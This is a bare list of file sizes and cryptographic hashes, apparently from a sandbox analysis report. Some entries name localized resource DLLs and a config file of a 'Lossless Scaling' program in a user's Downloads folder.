SHA5127feff998c5c7cf4e1cffbf8e654363168b10cd6b942116cb7ab04407ee0e3b40c523d5a273ce984a30ce7fdfb308a43e8ed41f7f3862faa0b25c083dd940ecb6
-
Filesize
7KB
MD5857f8a07b6c9ad9bd3bb6e4c047fee45
SHA1c2ded9a18bdb6cd2842db08354600a97cf90e032
SHA2567083023d5ba4768a6398a92dfc6f8a7556efbeafb6a4d60347aea0f69b2e89af
SHA512bbd176d8b6b46aa70a323e506a7d6ce671d14b79fc344cb0c4c8433ab761c9a7f6d2feed247276cda5503b6be529bd2e57c040a177725cc6ae7c100d76285e1f
-
Filesize
95KB
MD587a0ae5f11c8520bfa67fb4abb44f043
SHA100d749000686b5dd47fddaad034665afc5423e26
SHA256e97d791465d8cf2abe56450961f0cfa5278f4d0257da025ec949b541074d88e2
SHA5123c981c46e53e795536f5517589da01c858d3a19cf019c988bfe91814415e698707ac7178b5c6a6fa80ca20328b2f02387aa673c7001b9675b0d9b96b71bd95aa
-
Filesize
451B
MD561784c5b761fd222f9fc4cd0aad1ce94
SHA1ede36fbb733f67c2059dd9e6744f5a58913c139b
SHA256c3b21f00fb1451aae184e534311bd368b5677b61da75e52df7c9dbad7bcf5be0
SHA51276eeb2c26f0b36e56ac85b551410104ed3f5ca73a814af486f87ee213e86d57750a5c1546c77b49954f42aff9af631eca78de2e6cfa7dc8f700a7d06c16a023f
-
Filesize
432B
MD549af07d132592c9a62eaaef421e3e589
SHA1cb7cc0a4a492dba5773506e816467975cabdc227
SHA256487985d63734cd4828eaf03284e0d1d2fa684afc2d46da489c99d498f31a83ab
SHA5127525522f2b648aaf94e52fd1c1787931c11ca03e656ccbcca5879d6132d383aa40228256cbf93d0e7741f0003de6fe94ca537151a2162d33c077943b90fe5908
-
Filesize
629KB
MD5d3e9f98155c0faab869ccc74fb5e8a1e
SHA18e4feaad1d43306fdd8aa66efa443bca7afde710
SHA2563e0fdb5c40336482dacef3496116053d7772a51720900141b3c6f35c6e9b351b
SHA5122760c139ef276f406770675d89fb667f3369a9e1943a6eff2c18f391114018ad6fdce9daf0b499b18081ef22243ef04d74ff21cbd346eb31a1ddbcb79756697d
-
Filesize
327B
MD583bf9ba8becac139cb05c1ab68468e62
SHA18fab7c51fb2a340af6ed6cd03e1c546479e14239
SHA2567bfd69bdd83904d39a4e09c55fe6e380f027a2f13593c167acf92160bb9cf125
SHA512b3f19d613db7067cfc87c6c7e341f189c99fe1849ee67f18b4b63d65b6299612cd1c935fb713f274dfaf837b5dee17bde20f04e8682f85d75f42b1838ee04f04
-
Filesize
5KB
MD5b573eb820a0233acba7b6e33d1d8ed28
SHA181b96b594ff7f1c9e607ff712e78be821e60c491
SHA256919c8006bcf5c03ac8b4d83dfc824e4f918a6d3d2fcabd6bd905494ec79513ae
SHA5129d19d1042e82d064fb8d019b0af8c9fd9ddb931dda702998226c0df7ee7bc6c9c0c7b501c09637fccf0a8a9407ae4f7ec8a6f7afd3162236f7b244d3bd105b4d
-
Filesize
6KB
MD57cac76a8517a50e2972a49412f6d8322
SHA17c739c6cdbb2266f1349ac6d4105c054e0f3ac23
SHA25604c36687638947852d85d508dd255c6aea6cb8a53e94067bed7e8c976f75725e
SHA512e63a55b7f2c8a384807be77cc349c57bf6f39dd2f9f0b237957b7797ff4ef40da6d641c910346bb4ee511680a77ffd2725e9960e738841ece5fe6dd410f3b81a
-
Filesize
1KB
MD59bdee39a60aaec659b296df65153b040
SHA14778d44f9ec0641eac4418126ee9ed89e859a4ac
SHA2567344c1adca43f6d3f6434e48187b53dbe29f962cef68b3fcc6b204512747b3ef
SHA512cbbca9f4aca89b8d897726f7daa2fdf1392ca50a0f4d856a84e7866cb8403d2f8688cf7c7aad978e98861c048ed156273ddf2097d0fa4e5b7c56e3a82eb256c8
-
Filesize
250B
MD5ff047b633dfa3af4e5b5c78c1c84515b
SHA1edca05a1a23484322da3932074af30de93d4c041
SHA256963e9de4561957e19eb200c7446aaba4e59392040eaa5006717bf826a589cc21
SHA5123e0f46a9c8626a6f53e710676b42802f014f9bac8dbb1af58e42c3e1f7df80ca074e137d4b98fa5739b07028f11eed7f569b55232a2c85dd5d8a7b23dc8420d3
-
Filesize
16KB
MD5f803d675b73460adf21f4fbc31d8d5d8
SHA1e8c43c839b6ca5ce1185fd47187e1c59e2673faa
SHA2562696aab3218d13e02ea6541f14f77cfc6412c4f065db04dafbe4ed11673931dd
SHA51266e0b9e921e0f602b0c2ea3d55bd843dbe2a1e58fc24f1da0dec7d6803d3f249f8ee74df503bfc3e7adf15460a338b4099d1c07a218070099152dde6c319136b
-
Filesize
1KB
MD5ef4003d5449074011222ccbc5a2ebd84
SHA1d72323ef0837450d73d35ceb4210565400f6d7db
SHA256ca39a4436e43459d8d1a51f846794684be0ba38c3b1d1627d4276b453607c4bd
SHA5128bd1211a0d902ecc42cfba7cd726860698e016eefab853a291dd073481b9ccd9e22c879de1c8b40b3b8901c54587e46cb762de6950aa364d30ba3b75c52e3766
-
Filesize
4.3MB
MD57969a2cbc4c31ccfb1ab8213f19501b9
SHA106a24af6e922ba2cd7fccb76ce2f43271a9af8b6
SHA256486a48562504a274e984599a5931de200ea73bf6bc4c83bf6ca8daa651e80a68
SHA512935988a39c1af479e971850f6758ee94098b35f173da609206312deeabeb3bc9466f93d1dad4e6d7938235f65fc52fdbd56058d46c1ba775d31718358eb6d8fa
-
Filesize
953KB
MD52c98d33096e97094cbbbd19f27f40883
SHA17e28af9d119d2658f962e3b28140c6081be1612b
SHA256010ac1120a88a772e87d9e9018aa5db034a9bac9399803d4a7c4db3c47a71df6
SHA512f9070ad6b2e3295fdde13aa8d7486147a7f9a675a924ad3bf117479baf5b573cf92650199e58378dd8345a28ab890bbd5021d374030c24836bfa65bb037dddc7
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\LosslessScaling.exe.config
Filesize174B
MD52a2df45a07478a1c77d5834c21f3d7fd
SHA1f949e331f0d75ba38d33a072f74e2327c870d916
SHA256051099983b896673909e01a1f631b6652abb88da95c9f06f3efef4be033091fa
SHA5121a6dd48f92ea6b68ee23b86ba297cd1559f795946ecda17ade68aea3dda188869bba380e3ea3472e08993f4ae574c528b34c3e25503ee6119fd4f998835e09d7
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\ar\LosslessScaling.resources.dll
Filesize24KB
MD5ed6f1b887abd06c83ecb9c6ad4b6ddae
SHA1595f4748ee9f088d6c87281ba822c2e023cea9f2
SHA256e078d3fe1e5c3ef3ae5a22da414b33d29c3ae335397fd699a35f0b767e20ab29
SHA512c16bb876c0c6bf5f016a476649c4f99aa7a8679fbc7d356f33d13b65667878369a8aeadd010f828650385ce7783226505219a3b6adba22e33cbf30bcb706fcd0
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\bg\LosslessScaling.resources.dll
Filesize25KB
MD582deb57274920ad713665b7ecdd1f1b4
SHA1b3518aefb76fcf435cc2685dcbeb8aba46b29a04
SHA2562b62df6f0d46492562a7f2cb04e45c429e09fcbe76fb2faf7e275cbe29101ca3
SHA5121539f43d7d5333bd52c52b5b617aed69fcd1fa6a9b6e6ba07f0c09507c388eb6d9781d8de413fa3910f3177233346d4bdc8e4d53ba7e04e1862607c41924fc95
-
Filesize
430B
MD5ef7d84d756944b899e4fb5d1a3339235
SHA1bcac0a048a418caec5281cc44121576d1cde4e70
SHA256069ae15289a748ae4e1a998183c41c35a873cb8dc205318813b157c826bab6ca
SHA512a73e18adaa6f1e93a457d4593a652ee47eb730cac3b81cfbc1fc3ab90aa05f518ae7c96c78e94ab92949dd2c4e9a459bb54012e97fb53554397d5a6a8b556327
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\cs\LosslessScaling.resources.dll
Filesize20KB
MD50009b54449d6ee8d723be5266cb96c32
SHA153162779acc73b9a0cfb53a7b5b5917664958073
SHA2566f4cd5d91edee8dbc547a6f914f1441c5a55d559b784893a98b9ab3a1c96ee62
SHA5122e94a4a54cc2aad1df5be548722bc7d8266d60cde55e8187994f203474518d1faf66ae61ef3a19dc14c11b001038df6339ad3e8cb428faf3726c54086b0e0050
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\de\LosslessScaling.resources.dll
Filesize18KB
MD5bea43c84cdc466ddea1398d4026c3ef9
SHA1737b176c58d870acb9383b11c8d553c064ec2aff
SHA2567bdb17bfa2e73143efcd5bdaf089a2127c6175daf0ced23c9c4102011d09a89a
SHA512b9bbf206baef969d3960e9fa56b7edc320351698f66893dfa42897a7350e4e9d575e8cc4205ae28f2b8946d0f7f48fa2a550a30e7454423ec9d3812f5cb026e3
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\es-ES\LosslessScaling.resources.dll
Filesize20KB
MD5f6dd78c7f97a469c75152ec53d79bf8d
SHA1d96ce434f64b8a52475a91ddf6dc7c8086e38869
SHA2568f0222d248a18119d84822a851fbfd0d844e6cf58642e5132d96e3c75940ebf7
SHA512dc5c86a2182f591ba0fe1807138a05fb8bdbe6a0e1bcac43e3101f150bb2bd5c8132f201c5607e367436be9a9ba10e55db3e0084a359149e7f345ae5dfdd836b
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\fa\LosslessScaling.resources.dll
Filesize27KB
MD54b67439a021661921731ca43eb8efcef
SHA1ca3b9168c86548556b73fb153aca2fdeffbee214
SHA2560688ba5f3b55c43ad2436c2981f834b4af7e1b294314afa2f017baba6f4411fd
SHA512d2a52b91bd60ce8bb574747da13925404f4fddf196574c746dfdf6c1d2589bc2f746b807ef520c4340eaa6f11fa04efb4385fcb5f92eea01112709d9afbf6610
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\fr\LosslessScaling.resources.dll
Filesize21KB
MD539e11baaab6237ba61eb5e8b7a19a4fe
SHA14f5aafe9a8b78650a36529619c23a5a2cabb3eed
SHA256fe406bbc2bbdd8039876ad12ec946d46cac386a1ec9c73f40bcebb414ea55881
SHA5123de3de4ba2b4d93ec474b91933ce973baaa7c74aba7a9afa433ba9d13b3aa4765fb4a5e524f737d4d9437b570752ebdb1b143abf25d9020fec270b3cfe78f249
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\he\LosslessScaling.resources.dll
Filesize22KB
MD5854559ce6f1a4172247402bcb7ba6d6f
SHA13d999b3f8d9125ac619d3029b49e5a185370578a
SHA2564edec52a80b6f695343c617813b9d94260b1a31d02809d1055774da5ac4943a3
SHA5127fa81a302da4b99fe7ad446893dc90da710fe918b9934642ee2a66323fabdec562b0eb1bfc21070df11a7eb040f74d961090bbf040b4c38c8b86c7917aa5ca99
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\hr\LosslessScaling.resources.dll
Filesize19KB
MD5ba84b335d4991ee1c52a6bf85e1a2fa5
SHA125e524a30249a930faa0932b3a2d1d52b4a75f61
SHA256f0658c57595b27e93ffe8d797172eb9931e4f3407b9b9f0d1abda112d6921453
SHA512c8e09e219e070ccc6c4de2c98849f88869149d44b358d23b533291ee56b70ca265f9b34846dea3674e62a17fae38755e99c704448437830d90c820a8185e2f1a
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\id\LosslessScaling.resources.dll
Filesize19KB
MD58c512fab259d4ab880b3d2d1833b03cb
SHA1612561041d5a106444348cc5e59b186593b7b87f
SHA256fee70b83a178195944f9dc63e841da5c72a217c6f3ed04854a54c55307424668
SHA512c8632f3a8126cab39c2e25085397399028ddf4337e155ce1abbddb621569003819c42f5052c8274393a85975dd9f325ed7ba7899b4259c9e680bd886c9ac3bd2
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\it\LosslessScaling.resources.dll
Filesize20KB
MD54216eb3bcff34d8bf807ba9ae2329400
SHA19e3104f0caba8c9721720e24991e2ff767269fa6
SHA256961fe22ac5b8226e13161868c2af0de3700a157b3ec14a8036e6c85f0c38e158
SHA512d6551d03794594f9e9a602232d2ece63eb3ca26338949cc6684eefa1f2ddc9eb6fdd2a35b20410dd7978612d399ab882cc72ccd5b82097c9ce07b4ac7840fd72
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\ja\LosslessScaling.resources.dll
Filesize25KB
MD5c7a79602e51c7d382027d9cc4f4d9765
SHA1cbcdfd3cdad01eba053b0bb7251876e218011764
SHA256a2596374f8b643e4e4ac7d722a8f7ac83f9d315ab45bfa61074bf874651471bb
SHA51277020357d3ea423a4508b7219bd0406be95c3344859d3099c515e65b00c1e1a1e1b19b1114fad86c60531a5a1b3ff773169dea2c17d694fe4eda4ae52adf3025
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\ko\LosslessScaling.resources.dll
Filesize21KB
MD5f672890a2c8cfff5437ad16c4de614e6
SHA1ab869398470f3564920d8b6166730f8097fe64d9
SHA25681c8f6a0707331452dc857f5c67aa776bd7a6ac5c5af7b82fb554cf8815150c9
SHA512e40c8fad07dc8c02315251be9bbb0e475eb5a334e56a156b9418ba107c22e1311ffe08f7b380e2ffe9204b632e370a2c92be07578e38678097faeb5f648055b8
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\lt\LosslessScaling.resources.dll
Filesize18KB
MD523a9ec7c06004508d633a4c028acc355
SHA14143dad93782505fde5ee5903cd8da2716861b35
SHA2561b5151d2b5587ddebf3f84681ab917432e84bdabcb474c80ae8ca835373f66ba
SHA512777eb6d4666d4a9e69d2ec567df7acba97dbb28de00ea89d6bce54bf087bed9102e45aec26fe3ee07629acfc0bd72c557ebff0d213621ff619b70e9ffd1329c9
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\pl\LosslessScaling.resources.dll
Filesize20KB
MD5204bb095c3b6f2dd1900864515cf4396
SHA12c9585abc0e7141a605a727482c13aebe9511e19
SHA25684c89ef89af6099fa5b54e91e19c2e01c56ab0dc7c2cccc71a70465d1c0d5b0d
SHA512f546de9e27330f040c39c87f298b0bf7da480593619a978ab060192a72c0920a39979317268b88ae06dcdc7245aff26d229a118efd8deebc02ce8e630f0cf4a9
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\pt-BR\LosslessScaling.resources.dll
Filesize20KB
MD5b55ecbe34dbc613abfbdc8d57c2071b1
SHA11120bfc3fadab03e517f6bbc7f889ec3c5240572
SHA2562a993509736e479192fab00b8891720cce160027c0b2d4f1de972418d63b32d0
SHA512bb6caeb9e340c3c9f0915f55f39953d33ccc79fb5db89aa1bad8b2d19dfa59fed5bd156e7b1f440f48c2c0a37267da8cc9818f22912386221959f928ee7a4864
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\pt-PT\LosslessScaling.resources.dll
Filesize21KB
MD5ab3cde5ecc06776aca93dde3736c0015
SHA1b3ed86db4c026facc759185c02b62f2d4a20630d
SHA2561cbda2b28cef36d4af5806d5f22bdbd68ef04beed390b17fdde5e59fdb1b54eb
SHA5126c21c007ca3fad6e13baca82e04ea3b66db2c6cd698406dd6f03bf873beed9df885e88431c994e1047db42cab02278cc6cf03b28e3a85fdbe693780d77864e96
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\ro\LosslessScaling.resources.dll
Filesize20KB
MD5850d62f8f539b0bfa98237f603051b69
SHA1d7b28e068861c83ae689627f46ca39a32844a3c5
SHA2562624ea6a9a03f7ef41e011cc29efbcbc3d1b330a0903634e7a8c8f4b413cbc5b
SHA5124c2dc192d6eae695f223e1475bb26533c56f63fa0d77107ba5965892acf3fc7ef998b445b9ad7310324725f70f9790f9e92b6b99d9d960f360bb9ba75799ae23
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\sr-Latn\LosslessScaling.resources.dll
Filesize19KB
MD5582057f55647898e751a20e1800ee70b
SHA1a57b958478eca835230fcec3391fb076e79c9611
SHA256fef9fd58c457510844eecc4c6a868dbcb41855560301c4270c5478a9c64c3987
SHA51217301d317e692fd66114742ea3e971214b8fab9932ac3ceeb555e57954115c14de3fa142fb1100d851d26839907218e5e3a7db30316059872ea9b296f20dabe0
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\tr\LosslessScaling.resources.dll
Filesize20KB
MD521a59e82a064b4c4ae687a1965762f57
SHA1abd852cdb1d294a68e4bae8d1563d2954f98073a
SHA256836579c9cbe44121211c074a99dadafa78cb8c3731ec2e4efc258368cae544df
SHA5120027ae3ce2cddac83b64a4b7ca2d4ecbeebe3d5466ed7d94af020a80b6a11b14c0c55ba2af9dbdc3b6c290f38a72657e25761c5864a35fa54cc5b536bd1525d7
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\uk\LosslessScaling.resources.dll
Filesize27KB
MD507b5cdd450698660bddab7b89929eafb
SHA1e08490c84ac52f9a6157dbfa915c621afbfa5a65
SHA2564db3e2cdd1878c0d025b0a9d69dd0531574c4e8ac314a554c1d7ae7a943d8bfc
SHA512aad5c708e642ef7c9a2c2a498097c4a376e07bbd714d0627716da5b0892285117b401f9bf75f2f37203b7f0269ea785c337af161cf10a7d064c34d9db7afa8eb
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\vi\LosslessScaling.resources.dll
Filesize20KB
MD5174c893876a8b9fe092c675f2e7866de
SHA1d871fef312834e7ea8d772d7d9f36c2590701319
SHA256c4ed2b38efff02d56fe184ec420eaf7145091c039e2c4fe09bc7bb85ea399c60
SHA5125f17d96ba754b1bc493e674eb9bc65f8fcfe2b7952dfa7ad70cc7dd29d935e3354a8ac54954ee4be1cbe762a10d4731065bc099bd1aab746f5acaef76068ce90
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\zh-CN\LosslessScaling.resources.dll
Filesize17KB
MD56fb2ddb689455948d49f13e47903808f
SHA1dde68a02b3351b135d8b124451fa168f32ef47c7
SHA25648208349a891b0168e662884a339ba41945254aa4f7a69009db3fd8959ffcf5a
SHA512c73587aef1eb2f34f1c17316c7e8732bfd8b33d1fda16ee40e9c65cdc2f778bc368641e00026d277d17af66d4ebb9a0e70e32ed6881b8f2cfb4d5df786518673
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\zh-TW\LosslessScaling.resources.dll
Filesize17KB
MD537f6c40defabf6b52616e77e588efae4
SHA169b0ec19792a2367fc72b84721a78a99c18f9c95
SHA25693e95c9831f8baa3d295f61172930951220e3cf881a85f51cb76e3727562ad53
SHA512a306954a492ef89dad9d9b69cdc16234a35517f191ad67356558b6dba417656a0635b4aaee6ca2b985196c6d5141212138c2579b98cf2f08f11d4d5b8d1e0252
-
Filesize
1KB
MD5ef493142e81e5552a0ffd2d240b8f0e9
SHA187479ebb8e82b4e8447ee5bcbdcd4329bb5204b0
SHA2560c22b40a3588c88b561e80e5fca90274cf1f962d53fbfa321647c58e6b81e42f
SHA5120131a9f438f014f8b443033dc2c47efc0b35f4ac08b954edfeb2549f43099c751ebaa699c07d1a903d9413463f86bb96586e4737753cca021fc21fce8514b347
-
Filesize
288KB
MD5d74be7c1ee7a469c1911fc331541edf1
SHA13060ef10d3eb22186c4a9834549d6aefc140f0f9
SHA25673c8833e156c1b2c0b2f7aafc3c021ccb9bb174534e88cab787d8de149d0fc6f
SHA512b05a8014590debc1e56a474c46e59d996dceb40722702baf22de264fe38ef63b5e9019b812f4b341420f59d3280c70c85092b92adbfa8bb902070a876eeec38a